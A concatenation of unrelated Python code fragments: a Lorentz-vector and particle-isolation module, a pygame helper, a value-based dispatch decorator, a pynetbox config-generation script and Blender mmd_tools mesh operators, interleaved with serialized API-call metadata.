'plt.xlabel', (['"""epoch"""'], {}), "('epoch')\n", (4291, 4300), True, 'import matplotlib.pyplot as plt\n'), ((4305, 4346), 'matplotlib.pyplot.legend', 'plt.legend', (["['train', 'test']"], {'loc': '"""best"""'}), "(['train', 'test'], loc='best')\n", (4315, 
4346), True, 'import matplotlib.pyplot as plt\n'), ((4364, 4380), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(212)'], {}), '(212)\n', (4375, 4380), True, 'import matplotlib.pyplot as plt\n'), ((4385, 4418), 'matplotlib.pyplot.plot', 'plt.plot', (["history.history['loss']"], {}), "(history.history['loss'])\n", (4393, 4418), True, 'import matplotlib.pyplot as plt\n'), ((4423, 4460), 'matplotlib.pyplot.plot', 'plt.plot', (["history.history['val_loss']"], {}), "(history.history['val_loss'])\n", (4431, 4460), True, 'import matplotlib.pyplot as plt\n'), ((4465, 4488), 'matplotlib.pyplot.title', 'plt.title', (['"""model loss"""'], {}), "('model loss')\n", (4474, 4488), True, 'import matplotlib.pyplot as plt\n'), ((4493, 4511), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""loss"""'], {}), "('loss')\n", (4503, 4511), True, 'import matplotlib.pyplot as plt\n'), ((4516, 4535), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""epoch"""'], {}), "('epoch')\n", (4526, 4535), True, 'import matplotlib.pyplot as plt\n'), ((4540, 4581), 'matplotlib.pyplot.legend', 'plt.legend', (["['train', 'test']"], {'loc': '"""best"""'}), "(['train', 'test'], loc='best')\n", (4550, 4581), True, 'import matplotlib.pyplot as plt\n'), ((4586, 4596), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (4594, 4596), True, 'import matplotlib.pyplot as plt\n'), ((874, 901), 'keras.activations.get', 'activations.get', (['activation'], {}), '(activation)\n', (889, 901), False, 'from keras import initializers, regularizers, activations, constraints\n'), ((936, 972), 'keras.initializers.get', 'initializers.get', (['kernel_initializer'], {}), '(kernel_initializer)\n', (952, 972), False, 'from keras import initializers, regularizers, activations, constraints\n'), ((1007, 1043), 'keras.regularizers.get', 'regularizers.get', (['kernel_regularizer'], {}), '(kernel_regularizer)\n', (1023, 1043), False, 'from keras import initializers, regularizers, activations, constraints\n'), ((1077, 1111), 
'keras.constraints.get', 'constraints.get', (['kernel_constraint'], {}), '(kernel_constraint)\n', (1092, 1111), False, 'from keras import initializers, regularizers, activations, constraints\n'), ((1138, 1155), 'keras.engine.topology.InputSpec', 'InputSpec', ([], {'ndim': '(2)'}), '(ndim=2)\n', (1147, 1155), False, 'from keras.engine.topology import Layer, InputSpec\n'), ((1326, 1367), 'keras.models.Sequential', 'keras.models.Sequential', ([], {'name': '"""attention"""'}), "(name='attention')\n", (1349, 1367), False, 'import keras\n'), ((3551, 3567), 'keras.layers.LSTM', 'LSTM', (['col_hidden'], {}), '(col_hidden)\n', (3555, 3567), False, 'from keras.layers import LSTM\n'), ((3669, 3709), 'keras.layers.Dense', 'Dense', (['num_classes'], {'activation': '"""softmax"""'}), "(num_classes, activation='softmax')\n", (3674, 3709), False, 'from keras.layers import Input, Dense, TimeDistributed\n'), ((1404, 1611), 'keras.layers.Dense', 'keras.layers.Dense', (['dimensions'], {'input_shape': '(time_steps, dimensions)', 'kernel_initializer': 'self.kernel_initializer', 'kernel_regularizer': 'self.kernel_regularizer', 'kernel_constraint': 'self.kernel_constraint'}), '(dimensions, input_shape=(time_steps, dimensions),\n kernel_initializer=self.kernel_initializer, kernel_regularizer=self.\n kernel_regularizer, kernel_constraint=self.kernel_constraint)\n', (1422, 1611), False, 'import keras\n'), ((1867, 1907), 'keras.layers.Activation', 'keras.layers.Activation', (['self.activation'], {}), '(self.activation)\n', (1890, 1907), False, 'import keras\n'), ((1936, 2096), 'keras.layers.Dense', 'keras.layers.Dense', (['(1)'], {'kernel_initializer': 'self.kernel_initializer', 'kernel_regularizer': 'self.kernel_regularizer', 'kernel_constraint': 'self.kernel_constraint'}), '(1, kernel_initializer=self.kernel_initializer,\n kernel_regularizer=self.kernel_regularizer, kernel_constraint=self.\n kernel_constraint)\n', (1954, 2096), False, 'import keras\n'), ((2263, 2285), 
'keras.layers.Flatten', 'keras.layers.Flatten', ([], {}), '()\n', (2283, 2285), False, 'import keras\n'), ((2314, 2348), 'keras.layers.Activation', 'keras.layers.Activation', (['"""softmax"""'], {}), "('softmax')\n", (2337, 2348), False, 'import keras\n'), ((2386, 2423), 'keras.layers.RepeatVector', 'keras.layers.RepeatVector', (['dimensions'], {}), '(dimensions)\n', (2411, 2423), False, 'import keras\n'), ((2461, 2489), 'keras.layers.Permute', 'keras.layers.Permute', (['[2, 1]'], {}), '([2, 1])\n', (2481, 2489), False, 'import keras\n'), ((2782, 2805), 'keras.layers.Multiply', 'keras.layers.Multiply', ([], {}), '()\n', (2803, 2805), False, 'import keras\n'), ((2985, 3023), 'keras.activations.serialize', 'activations.serialize', (['self.activation'], {}), '(self.activation)\n', (3006, 3023), False, 'from keras import initializers, regularizers, activations, constraints\n'), ((3059, 3106), 'keras.initializers.serialize', 'initializers.serialize', (['self.kernel_initializer'], {}), '(self.kernel_initializer)\n', (3081, 3106), False, 'from keras import initializers, regularizers, activations, constraints\n'), ((3142, 3189), 'keras.regularizers.serialize', 'regularizers.serialize', (['self.kernel_regularizer'], {}), '(self.kernel_regularizer)\n', (3164, 3189), False, 'from keras import initializers, regularizers, activations, constraints\n'), ((3224, 3269), 'keras.constraints.serialize', 'constraints.serialize', (['self.kernel_constraint'], {}), '(self.kernel_constraint)\n', (3245, 3269), False, 'from keras import initializers, regularizers, activations, constraints\n'), ((3485, 3501), 'keras.layers.LSTM', 'LSTM', (['row_hidden'], {}), '(row_hidden)\n', (3489, 3501), False, 'from keras.layers import LSTM\n')] |
import numpy as np
import math
from pyspark.sql import Row
"""
Implementation of Lorentz vector
"""
class LorentzVector(object):
    """Minimal re-implementation of ROOT's TLorentzVector.

    Stores the Cartesian momentum components (x, y, z) and the
    energy/time component t.
    """

    def __init__(self, *args):
        # Accepts either no arguments (components filled in later through
        # the Set* methods) or all four components (x, y, z, t).
        if len(args) > 0:
            self.x = args[0]
            self.y = args[1]
            self.z = args[2]
            self.t = args[3]

    def SetPtEtaPhiM(self, pt, eta, phi, mass):
        """Set the components from collider coordinates (pt, eta, phi, mass)."""
        pt = abs(pt)
        self.SetPtEtaPhiM_impl = None  # no-op placeholder removed
        self.SetXYZM(pt*math.cos(phi), pt*math.sin(phi), pt*math.sinh(eta), mass)

    def SetXYZM(self, x, y, z, m):
        """Set the Cartesian momentum and derive the energy from mass m.

        A negative m is treated as an imaginary mass (ROOT convention):
        the energy is sqrt(max(p^2 - m^2, 0)), clamped at zero.
        """
        self.x = x
        self.y = y
        self.z = z
        if (m >= 0):
            self.t = math.sqrt(x*x + y*y + z*z + m*m)
        else:
            self.t = math.sqrt(max(x*x + y*y + z*z - m*m, 0))

    def E(self):
        """Energy (time component)."""
        return self.t

    def Px(self):
        return self.x

    def Py(self):
        return self.y

    def Pz(self):
        return self.z

    def Pt(self):
        """Transverse momentum, sqrt(x^2 + y^2)."""
        return math.sqrt(self.x*self.x + self.y*self.y)

    def Eta(self):
        """Pseudorapidity.

        Bug fix: the original implementation fell through and returned
        None for vectors along the beam axis (|cosTheta| >= 1 with
        z != 0), which made DeltaR raise TypeError. ROOT's
        TLorentzVector returns +/-10e10 in that case; that convention is
        reproduced here.
        """
        cosTheta = self.CosTheta()
        if cosTheta*cosTheta < 1:
            return -0.5*math.log((1.0 - cosTheta)/(1.0 + cosTheta))
        if self.z == 0:
            return 0
        # |cosTheta| >= 1 and z != 0: vector is parallel to the z axis.
        return 10e10 if self.z > 0 else -10e10

    def mag(self):
        """Magnitude of the 3-vector."""
        return math.sqrt(self.x*self.x + self.y*self.y + self.z*self.z)

    def CosTheta(self):
        # A zero-magnitude vector is conventionally assigned cosTheta = 1.
        return 1.0 if self.mag() == 0.0 else self.z/self.mag()

    def Phi(self):
        """Azimuthal angle in (-pi, pi]."""
        return math.atan2(self.y, self.x)

    def DeltaR(self, other):
        """Angular distance sqrt(dEta^2 + dPhi^2) with dPhi wrapped to [-pi, pi]."""
        deta = self.Eta() - other.Eta()
        dphi = self.Phi() - other.Phi()
        pi = math.pi
        while dphi > pi:
            dphi -= 2*pi
        while dphi < -pi:
            dphi += 2*pi
        return math.sqrt(deta*deta + dphi*dphi)
"""
Functions used to return the Pt map of selected tracks, neutrals and photons
"""
def ChPtMapp(DR, event):
    """Return an (N, 3) array of [Eta, Phi, PT] for tracks with PT > 0.5.

    The DR argument is accepted for interface symmetry with the other
    Pt-map helpers but is not used here.
    """
    selected = [[trk.Eta, trk.Phi, trk.PT]
                for trk in event.EFlowTrack
                if trk.PT > 0.5]
    return np.asarray(selected)
def NeuPtMapp(DR, event):
    """Return an (N, 3) array of [Eta, Phi, ET] for neutral hadrons with ET > 1.0.

    The DR argument is accepted for interface symmetry but unused.
    """
    selected = [[had.Eta, had.Phi, had.ET]
                for had in event.EFlowNeutralHadron
                if had.ET > 1.0]
    return np.asarray(selected)
def PhotonPtMapp(DR, event):
    """Return an (N, 3) array of [Eta, Phi, ET] for photons with ET > 1.0.

    The DR argument is accepted for interface symmetry but unused.
    """
    selected = [[ph.Eta, ph.Phi, ph.ET]
                for ph in event.EFlowPhoton
                if ph.ET > 1.0]
    return np.asarray(selected)
"""
Functions used to return the Pt map of selected tracks, neutrals and photons
Versions used for the optimized filtering with Spark SQL and HOF
"""
# get the selected tracks
def ChPtMapp2(Tracks):
    """Return an (N, 3) float array of [Eta, Phi, PT] for pre-selected tracks.

    Tracks are dict-like rows (Spark SQL Row objects). The array is
    pre-allocated so an empty input still yields shape (0, 3).
    """
    out = np.empty((len(Tracks), 3))
    for row, trk in enumerate(Tracks):
        out[row, 0] = trk["Eta"]
        out[row, 1] = trk["Phi"]
        out[row, 2] = trk["PT"]
    return out
# get the selected neutrals
def NeuPtMapp2(NeutralHadrons):
    """Return an (N, 3) float array of [Eta, Phi, ET] for pre-selected neutrals.

    Rows are dict-like (Spark SQL Row objects); an empty input yields
    shape (0, 3) thanks to the pre-allocated array.
    """
    out = np.empty((len(NeutralHadrons), 3))
    for row, had in enumerate(NeutralHadrons):
        out[row, 0] = had["Eta"]
        out[row, 1] = had["Phi"]
        out[row, 2] = had["ET"]
    return out
# get the selected photons
def PhotonPtMapp2(Photons):
    """Return an (N, 3) float array of [Eta, Phi, ET] for pre-selected photons.

    Rows are dict-like (Spark SQL Row objects); an empty input yields
    shape (0, 3) thanks to the pre-allocated array.
    """
    out = np.empty((len(Photons), 3))
    for row, ph in enumerate(Photons):
        out[row, 0] = ph["Eta"]
        out[row, 1] = ph["Phi"]
        out[row, 2] = ph["ET"]
    return out
"""
Get the particle ISO
"""
def PFIso(p, DR, PtMap, subtractPt):
    """Compute the particle-flow isolation of particle *p*.

    Sums the pT (column 2 of *PtMap*, rows of [Eta, Phi, pT]) of all
    candidates inside a cone of radius *DR* around *p*, divided by the
    particle's own pT. When *subtractPt* is true, 1 is subtracted so the
    particle's own contribution is removed.
    """
    if p.Pt() <= 0.:
        return 0.
    d_eta = PtMap[:, 0] - p.Eta()
    d_phi = PtMap[:, 1] - p.Phi()
    two_pi = 2. * math.pi
    # Fold azimuthal differences beyond +/-2*pi back by one period.
    # NOTE(review): the wrap threshold here is 2*pi, not pi — this mirrors
    # the original code exactly; confirm it is the intended convention.
    d_phi = d_phi - two_pi * (d_phi > two_pi) + two_pi * (d_phi < -1. * two_pi)
    in_cone = d_phi * d_phi + d_eta * d_eta < DR * DR
    iso = PtMap[in_cone, 2].sum() / p.Pt()
    if subtractPt:
        iso = iso - 1
    return float(iso)
| [
"math.sqrt",
"numpy.asarray",
"math.log",
"math.cos",
"math.atan2",
"math.sin",
"math.sinh"
] | [((1956, 1973), 'numpy.asarray', 'np.asarray', (['pTmap'], {}), '(pTmap)\n', (1966, 1973), True, 'import numpy as np\n'), ((2141, 2158), 'numpy.asarray', 'np.asarray', (['pTmap'], {}), '(pTmap)\n', (2151, 2158), True, 'import numpy as np\n'), ((2322, 2339), 'numpy.asarray', 'np.asarray', (['pTmap'], {}), '(pTmap)\n', (2332, 2339), True, 'import numpy as np\n'), ((935, 979), 'math.sqrt', 'math.sqrt', (['(self.x * self.x + self.y * self.y)'], {}), '(self.x * self.x + self.y * self.y)\n', (944, 979), False, 'import math\n'), ((1207, 1269), 'math.sqrt', 'math.sqrt', (['(self.x * self.x + self.y * self.y + self.z * self.z)'], {}), '(self.x * self.x + self.y * self.y + self.z * self.z)\n', (1216, 1269), False, 'import math\n'), ((1393, 1419), 'math.atan2', 'math.atan2', (['self.y', 'self.x'], {}), '(self.y, self.x)\n', (1403, 1419), False, 'import math\n'), ((1666, 1702), 'math.sqrt', 'math.sqrt', (['(deta * deta + dphi * dphi)'], {}), '(deta * deta + dphi * dphi)\n', (1675, 1702), False, 'import math\n'), ((600, 640), 'math.sqrt', 'math.sqrt', (['(x * x + y * y + z * z + m * m)'], {}), '(x * x + y * y + z * z + m * m)\n', (609, 640), False, 'import math\n'), ((400, 413), 'math.cos', 'math.cos', (['phi'], {}), '(phi)\n', (408, 413), False, 'import math\n'), ((418, 431), 'math.sin', 'math.sin', (['phi'], {}), '(phi)\n', (426, 431), False, 'import math\n'), ((436, 450), 'math.sinh', 'math.sinh', (['eta'], {}), '(eta)\n', (445, 450), False, 'import math\n'), ((1091, 1136), 'math.log', 'math.log', (['((1.0 - cosTheta) / (1.0 + cosTheta))'], {}), '((1.0 - cosTheta) / (1.0 + cosTheta))\n', (1099, 1136), False, 'import math\n')] |
import pygame
from Utils.Math_utils import distance
class SpriteUtils:
    """Helpers for querying pygame sprites."""

    @staticmethod
    def get_closet_enemy(x, y, max_radius, sprites: [pygame.sprite.Sprite], metric_func):
        """Return the sprite selected by *metric_func* (e.g. min/max with a
        distance key) among those whose rect centre lies within
        *max_radius* of (x, y); None when no sprite is in range."""
        in_range = [spr for spr in sprites
                    if distance((x, y), (spr.rect.centerx, spr.rect.centery)) <= max_radius]
        if not in_range:
            return None
        return metric_func(in_range,
                           key=lambda spr: distance((x, y), (spr.rect.centerx, spr.rect.centery)))
| [
"Utils.Math_utils.distance"
] | [((245, 299), 'Utils.Math_utils.distance', 'distance', (['(x, y)', '(pos.rect.centerx, pos.rect.centery)'], {}), '((x, y), (pos.rect.centerx, pos.rect.centery))\n', (253, 299), False, 'from Utils.Math_utils import distance\n'), ((451, 505), 'Utils.Math_utils.distance', 'distance', (['(x, y)', '(pos.rect.centerx, pos.rect.centery)'], {}), '((x, y), (pos.rect.centerx, pos.rect.centery))\n', (459, 505), False, 'from Utils.Math_utils import distance\n')] |
from math import sqrt

# Read the red/blue counts; their sum must factor into an (a x b) grid
# whose interior (a-2)(b-2) equals the blue count.
red, blue = map(int, input().split())
total = red + blue
for small in range(1, int(sqrt(total)) + 1):
    if total % small:
        continue
    big = total // small  # big >= small since small <= sqrt(total)
    if big > 2 and small > 2 and (big - 2) * (small - 2) == blue:
        print(big, small)
"math.sqrt"
] | [((87, 94), 'math.sqrt', 'sqrt', (['S'], {}), '(S)\n', (91, 94), False, 'from math import sqrt\n')] |
""" Like functools.singledispatch, but dynamic, value-based dispatch. """
__all__ = ('dynamic_dispatch',)
import functools
import inspect
from typing import Union, Callable, Type, Hashable
from dynamic_dispatch._class import class_dispatch
from dynamic_dispatch._func import func_dispatch
from ._typeguard import typechecked
@typechecked(always=True)
def dynamic_dispatch(func: Union[Callable, Type, None] = None, *, default: bool = False):
    """
    Value-based dynamic-dispatch decorator for classes and functions.

    The decorated callable dispatches on the *value* of its first argument.
    Alternative implementations are registered through the ``dispatch``
    attribute of the returned object, e.g. ``@foo.dispatch(on=5)``; if the
    registered implementation has a parameter named like ``foo``'s first
    parameter, the dispatch value is passed along. When ``default`` is
    True, the decorated object itself serves as the fallback for
    unregistered values.

    :Example:
        >>> @dynamic_dispatch(default=True)
        >>> def foo(bar: int):
        >>>     print(bar)
        >>>
        >>> @foo.dispatch(on=5)
        >>> def _(bar: int, baz: int):
        >>>     print(bar * baz)
        >>>
        >>> foo(1)
        1
        >>> foo(5, 10)
        50

    :param func: class or function to add dynamic dispatch to.
    :param default: whether or not to use func as the default implementation.
    :returns: func with dynamic dispatch
    """
    if func is None:
        # Invoked as @dynamic_dispatch(default=...): produce a decorator
        # that waits for the actual target.
        return functools.partial(dynamic_dispatch, default=default)

    # Classes get their own wrapper implementation.
    if inspect.isclass(func):
        return class_dispatch(func, default)

    dispatcher = func_dispatch(func, default=default)
    raw_dispatch = dispatcher.dispatch

    def replacement(impl: Callable = None, *, on: Hashable):
        # Support both @f.dispatch(on=...) decorator usage and a direct
        # f.dispatch(impl, on=...) call; hide the implicit `arguments`
        # parameter from callers.
        if impl is None:
            return functools.partial(replacement, on=on)
        params = inspect.signature(impl).parameters
        return raw_dispatch(impl, arguments=params, on=on)

    # Type checker complains if we assign directly.
    setattr(dispatcher, 'dispatch', replacement)
    return dispatcher
| [
"dynamic_dispatch._class.class_dispatch",
"inspect.signature",
"dynamic_dispatch._func.func_dispatch",
"functools.partial",
"inspect.isclass"
] | [((2313, 2334), 'inspect.isclass', 'inspect.isclass', (['func'], {}), '(func)\n', (2328, 2334), False, 'import inspect\n'), ((2393, 2429), 'dynamic_dispatch._func.func_dispatch', 'func_dispatch', (['func'], {'default': 'default'}), '(func, default=default)\n', (2406, 2429), False, 'from dynamic_dispatch._func import func_dispatch\n'), ((2213, 2265), 'functools.partial', 'functools.partial', (['dynamic_dispatch'], {'default': 'default'}), '(dynamic_dispatch, default=default)\n', (2230, 2265), False, 'import functools\n'), ((2351, 2380), 'dynamic_dispatch._class.class_dispatch', 'class_dispatch', (['func', 'default'], {}), '(func, default)\n', (2365, 2380), False, 'from dynamic_dispatch._class import class_dispatch\n'), ((2615, 2652), 'functools.partial', 'functools.partial', (['replacement'], {'on': 'on'}), '(replacement, on=on)\n', (2632, 2652), False, 'import functools\n'), ((2694, 2717), 'inspect.signature', 'inspect.signature', (['impl'], {}), '(impl)\n', (2711, 2717), False, 'import inspect\n')] |
from pprint import pprint
from collections import defaultdict
import yaml
import pynetbox
def get_netbox():
    """
    Return a Netbox API handler with TLS verification disabled.

    Returns:
        pynetbox.core.api.Api -- Netbox API handler
    """
    # NOTE(review): "1192.168.127.12" is not a valid IPv4 address — the
    # leading "1192" octet looks like a paste typo; confirm the real host.
    nburl = "http://1192.168.127.12:8000/"
    # TODO: load the token from an environment variable instead of
    # hard-coding it in source.
    NETBOX_TOKEN = "<KEY>"
    nb = pynetbox.api(url=nburl, token=NETBOX_TOKEN, threading=True)
    # Bug fix: the original called requests.Session() although `requests`
    # was never imported in this module (NameError at call time). pynetbox
    # already attaches a requests.Session as `http_session`, so disabling
    # certificate verification on it achieves the same effect.
    # https://pynetbox.readthedocs.io/en/latest/advanced.html#ssl-verification
    nb.http_session.verify = False
    return nb
# Shared module-level Netbox API handle, created once at import time.
nb = get_netbox()
def ddict():
    """Return an auto-vivifying tree: a defaultdict whose missing keys
    materialize as further nested defaultdicts of the same kind."""
    return defaultdict(ddict)
def ddict2dict(d):
    """Recursively convert *d* (typically the nested defaultdict tree
    produced by ``ddict``) into plain ``dict`` objects, e.g. so YAML/JSON
    serializers emit clean mappings.

    Bug fix: the original rebound ``d[k]`` while converting, mutating the
    caller's tree in place as a side effect. This version is pure — it
    builds a new dict at every level and leaves the input untouched —
    while returning the same result.
    """
    return {k: ddict2dict(v) if isinstance(v, dict) else v
            for k, v in d.items()}
# Assemble the device structured configuration in an auto-vivifying tree
# (see ddict): bare key lookups below intentionally create empty nodes.
structured_config = ddict()
structured_config["router_bgp"]= {} #TODO
structured_config["static_routes"]= {} #TODO
structured_config["service_routing_protocols_model"]= "multi-agent"
structured_config["ip_routing"]= True
structured_config["vlan_internal_order"]["allocation"]= "ascending"
structured_config["vlan_internal_order"]["range"]["beginning"]= 1006
structured_config["vlan_internal_order"]["range"]["ending"]= 1199
# Bare lookup: auto-creates an empty "name_server" node via the defaultdict.
structured_config["name_server"] #TODO
structured_config["spanning_tree"]["mode"] = "mstp"
structured_config["spanning_tree"]["mst_instances"]["0"]["priority"] = 4096
# Pull the 'local-users' config context from Netbox.
# NOTE(review): this performs network I/O at module import time.
userscf= nb.extras.config_contexts.get(name='local-users').data
users= userscf["system"]["aaa"]["authentication"]["users"]
# Flatten each user entry from the config context into the output tree.
for user in users:
    structured_config["local_users"][user]["privilege"]= users[user]['privilege']
    structured_config["local_users"][user]["sha512_password"]= users[user]['password']
    structured_config["local_users"][user]["role"]= users[user]['role']
# The bare lookups below pre-create empty sections to be filled in later.
structured_config["vrfs"] #TODO
structured_config["management_interfaces"] #TODO
structured_config["management_api_http"] #TODO
structured_config["ethernet_interfaces"] #TODO
structured_config["loopback_interfaces"] #TODO
structured_config["vlan_interfaces"] #TODO
structured_config["vxlan_interface"] #TODO
structured_config["prefix_lists"] #TODO
structured_config["route_maps"] #TODO
structured_config["router_bfd"] #TODO
structured_config["vlans"] #TODO
structured_config["ip_igmp_snooping"]["globally_enabled"]= True
structured_config["ip_virtual_router_mac_address"] = "00:00:00:00:00:01"
structured_config["virtual_source_nat_vrfs"] #TODO
# Convert the defaultdict tree to plain dicts so YAML serializes cleanly.
output=yaml.dump(ddict2dict(structured_config), allow_unicode=True, default_flow_style=False)
print(output)
"pynetbox.api",
"collections.defaultdict"
] | [((429, 488), 'pynetbox.api', 'pynetbox.api', ([], {'url': 'nburl', 'token': 'NETBOX_TOKEN', 'threading': '(True)'}), '(url=nburl, token=NETBOX_TOKEN, threading=True)\n', (441, 488), False, 'import pynetbox\n'), ((579, 597), 'collections.defaultdict', 'defaultdict', (['ddict'], {}), '(ddict)\n', (590, 597), False, 'from collections import defaultdict\n')] |
# -*- coding: utf-8 -*-
import re
import bpy
from bpy.types import Operator
from collections import OrderedDict
from mmd_tools import utils
from mmd_tools.core import model as mmd_model
from mmd_tools.core.morph import FnMorph
from mmd_tools.core.material import FnMaterial
PREFIX_PATT = r'(?P<prefix>[0-9A-Z]{3}_)(?P<name>.*)'
class CleanShapeKeys(Operator):
    """Operator: remove shape keys that deform nothing from the selected meshes."""
    bl_idname = 'mmd_tools.clean_shape_keys'
    bl_label = 'Clean Shape Keys'
    bl_description = 'Remove unused shape keys of selected mesh objects'
    bl_options = {'PRESET'}
    @classmethod
    def poll(cls, context):
        # Available whenever at least one object is selected.
        return len(context.selected_objects) > 0
    @staticmethod
    def __can_remove(key_block):
        # A key is removable when every vertex coordinate equals its
        # relative (base) key, i.e. it has no deforming effect.
        if key_block.relative_key == key_block:
            return False # Basis
        for v0, v1 in zip(key_block.relative_key.data, key_block.data):
            if v0.co != v1.co:
                return False
        return True
    def __shape_key_clean(self, context, obj, key_blocks):
        # Blender >= 2.75 path: remove directly via Object.shape_key_remove().
        # NOTE(review): this iterates key_blocks while removing from it —
        # confirm bpy's collection iteration tolerates in-loop removal here.
        for kb in key_blocks:
            if self.__can_remove(kb):
                obj.shape_key_remove(kb)
    def __shape_key_clean_old(self, context, obj, key_blocks):
        # Legacy path (< 2.75): the removal operator acts on the active
        # shape key of the active object, so iterate indices in reverse.
        context.scene.objects.active = obj
        for i in reversed(range(len(key_blocks))):
            kb = key_blocks[i]
            if self.__can_remove(kb):
                obj.active_shape_key_index = i
                bpy.ops.object.shape_key_remove()
    # Select the implementation once, at class-creation time, based on the
    # running Blender version.
    __do_shape_key_clean = __shape_key_clean_old if bpy.app.version < (2, 75, 0) else __shape_key_clean
    def execute(self, context):
        """Strip no-op shape keys from every selected relative-keyed mesh."""
        for ob in context.selected_objects:
            if ob.type != 'MESH' or ob.data.shape_keys is None:
                continue
            if not ob.data.shape_keys.use_relative:
                continue # not be considered yet
            key_blocks = ob.data.shape_keys.key_blocks
            counts = len(key_blocks)
            self.__do_shape_key_clean(context, ob, key_blocks)
            counts -= len(key_blocks)
            self.report({ 'INFO' }, 'Removed %d shape keys of object "%s"'%(counts, ob.name))
        return {'FINISHED'}
class SeparateByMaterials(Operator):
    """Operator: split the active mesh into one object per material while
    keeping the MMD model's material-morph bookkeeping consistent."""
    bl_idname = 'mmd_tools.separate_by_materials'
    bl_label = 'Separate by materials'
    bl_description = 'Separate by materials'
    bl_options = {'PRESET'}
    clean_shape_keys = bpy.props.BoolProperty(
        name='Clean Shape Keys',
        description='Remove unused shape keys of separated objects',
        default=True,
        )
    @classmethod
    def poll(cls, context):
        obj = context.active_object
        return obj and obj.type == 'MESH'
    def invoke(self, context, event):
        # Show the property dialog (clean_shape_keys toggle) before running.
        vm = context.window_manager
        return vm.invoke_props_dialog(self)
    def execute(self, context):
        obj = context.active_object
        root = mmd_model.Model.findRoot(obj)
        # Any in-progress morph editing state must be cleared first, since
        # separation would leave temporary materials/views dangling.
        if root and root.mmd_root.editing_morphs > 0:
            bpy.ops.mmd_tools.clear_temp_materials()
            bpy.ops.mmd_tools.clear_uv_morph_view()
            self.report({ 'WARNING' }, "Active editing morphs were cleared")
            # return { 'CANCELLED' }
        if root:
            # Store the current material names
            rig = mmd_model.Model(root)
            mat_names = [mat.name for mat in rig.materials()]
        utils.separateByMaterials(obj)
        if self.clean_shape_keys:
            bpy.ops.mmd_tools.clean_shape_keys()
        if root:
            rig = mmd_model.Model(root)
            # The material morphs store the name of the mesh, not of the object.
            # So they will not be out of sync
            # Re-prefix single-material meshes so their sort order matches
            # the original material order (base-36 NNN_ prefix).
            for mesh in rig.meshes():
                if len(mesh.data.materials) == 1:
                    mat = mesh.data.materials[0]
                    idx = mat_names.index(mat.name)
                    prefix = utils.int2base(idx, 36)
                    prefix = '0'*(3 - len(prefix)) + prefix + '_'
                    ma = re.match(PREFIX_PATT, mesh.name)
                    if ma:
                        mesh.name = prefix + ma.group('name')
                    else:
                        mesh.name = prefix + mesh.name
        # Refresh each material morph's related-mesh reference.
        if root and len(root.mmd_root.material_morphs) > 0:
            for morph in root.mmd_root.material_morphs:
                mo = FnMorph(morph, mmd_model.Model(root))
                mo.update_mat_related_mesh()
        utils.clearUnusedMeshes()
        return {'FINISHED'}
class JoinMeshes(Operator):
    """Operator: merge all meshes of the active MMD model into a single
    object, preserving material order and shape-key (vertex morph) order."""
    # NOTE(review): idname says 'mmd_tool' (no trailing 's') unlike the
    # other operators — looks like a typo, but changing it would break any
    # callers/keymaps referencing it; confirm before renaming.
    bl_idname = 'mmd_tool.join_meshes'
    bl_label = 'Join Meshes'
    bl_description = 'Join the Model meshes into a single one'
    bl_options = {'PRESET'}
    @classmethod
    def poll(cls, context):
        obj = context.active_object
        return obj and obj.type == 'MESH'
    def execute(self, context):
        obj = context.active_object
        root = mmd_model.Model.findRoot(obj)
        if root is None:
            self.report({ 'ERROR' }, 'Select a MMD model')
            return { 'CANCELLED' }
        # Clear in-progress morph editing so no temp materials/views leak
        # into the joined mesh.
        if root.mmd_root.editing_morphs > 0:
            bpy.ops.mmd_tools.clear_temp_materials()
            bpy.ops.mmd_tools.clear_uv_morph_view()
            self.report({ 'WARNING' }, "Active editing morphs were cleared")
        # Find all the meshes in mmd_root
        # NOTE(review): meshes_list[0] raises IndexError for a model with
        # no meshes — confirm poll() guarantees at least one mesh here.
        rig = mmd_model.Model(root)
        meshes_list = list(rig.meshes())
        active_mesh = meshes_list[0]
        # bpy.ops.object.join() joins every selected object into the active
        # one, so select all model meshes (unhiding them first) and make
        # the first mesh active.
        bpy.ops.object.select_all(action='DESELECT')
        act_layer = context.scene.active_layer
        for mesh in meshes_list:
            mesh.layers[act_layer] = True
            mesh.hide_select = False
            mesh.hide = False
            mesh.select = True
        bpy.context.scene.objects.active = active_mesh
        # Store the current order of the materials
        for m in meshes_list[1:]:
            for mat in m.data.materials:
                if mat and mat.name not in active_mesh.data.materials:
                    active_mesh.data.materials.append(mat)
        # Store the current order of shape keys (vertex morphs)
        __get_key_blocks = lambda x: x.data.shape_keys.key_blocks if x.data.shape_keys else []
        shape_key_names = OrderedDict([(kb.name, None) for m in meshes_list for kb in __get_key_blocks(m)])
        shape_key_names = sorted(shape_key_names.keys(), key=lambda x: root.mmd_root.vertex_morphs.find(x))
        FnMorph.storeShapeKeyOrder(active_mesh, shape_key_names)
        active_mesh.active_shape_key_index = 0
        # Join selected meshes
        bpy.ops.object.join()
        # Point every material morph at the surviving joined mesh.
        if len(root.mmd_root.material_morphs) > 0:
            for morph in root.mmd_root.material_morphs:
                mo = FnMorph(morph, rig)
                mo.update_mat_related_mesh(active_mesh)
        utils.clearUnusedMeshes()
        return { 'FINISHED' }
class AttachMeshesToMMD(Operator):
    """Operator: parent orphan meshes on the active layer to the selected
    MMD model's armature."""
    bl_idname = 'mmd_tools.attach_meshes_to_mmd'
    bl_label = 'Attach Meshes to Model'
    bl_description = 'Finds existing meshes and attaches them to the selected MMD model'
    bl_options = {'PRESET'}

    @classmethod
    def poll(cls, context):
        active = context.active_object
        return active and mmd_model.Model.findRoot(active)

    def execute(self, context):
        root = mmd_model.Model.findRoot(context.active_object)
        rig = mmd_model.Model(root)
        armature = rig.armature()
        if armature is None:
            self.report({ 'ERROR' }, 'Model Armature not found')
            return { 'CANCELLED' }
        active_layer = bpy.context.scene.active_layer
        for candidate in bpy.context.scene.objects:
            # Only plain meshes on the active layer are candidates.
            if not (candidate.layers[active_layer]
                    and candidate.type == 'MESH'
                    and candidate.mmd_type == 'NONE'):
                continue
            if mmd_model.Model.findRoot(candidate) is not None:
                # Do not attach meshes that already belong to some model.
                continue
            candidate.parent = armature
        return { 'FINISHED' }
def _normalize_mesh_names(meshes):
    """
    Helper method that sets a zero-padded base-36 "NNN_" sort prefix on
    each mesh object, replacing any existing prefix.
    """
    for index, mesh in enumerate(meshes):
        base36 = utils.int2base(index, 36)
